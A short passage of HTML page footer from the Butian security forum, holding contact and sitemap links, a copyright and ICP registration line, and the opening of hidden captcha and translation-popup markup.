<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">Contact us</a><span class=span-line>|</span>
<a href=https://forum.butian.net/sitemap>sitemap</a>
</div>
<div class="copyright mt-10">
Copyright © 2013-2023 BUTIAN.NET. All rights reserved. <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
</div>
</div>
</footer>
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
